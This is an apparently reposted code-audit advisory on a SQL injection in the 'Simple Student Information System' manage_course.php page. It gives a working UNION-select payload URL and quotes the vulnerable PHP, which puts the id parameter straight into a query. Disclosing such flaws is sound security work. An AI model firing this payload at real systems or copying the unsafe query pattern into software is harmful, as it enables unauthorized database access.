2
PHP代码审计—Simple Student Information System manage_course.php SQL Injection
source link: https://bewhale.github.io/post/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E2%80%94Simple%20Student%20Information%20System%20manage_course.php%20SQL%20Injection/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
PHP代码审计—Simple Student Information System manage_course.php SQL Injection
Vendor Homepage:
https://www.sourcecodester.com
Source Code Download:
Payload
Simple Student Information System SQL Injection
http://192.168.1.8/sis/admin/courses/manage_course.php?id=-6659%27%20%20union%20select%201,2,database(),user(),5,6,7,8--%20-
admin/courses/manage_course.php
line 1-13,
<?php
require_once('../../config.php');
if(isset($_GET['id'])){
$qry = $conn->query("SELECT * FROM `course_list` where id = '{$_GET['id']}'");
if($qry->num_rows > 0){
$res = $qry->fetch_array();
foreach($res as $k => $v){
if(!is_numeric($k))
$$k = $v;
}
}
}
?>
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK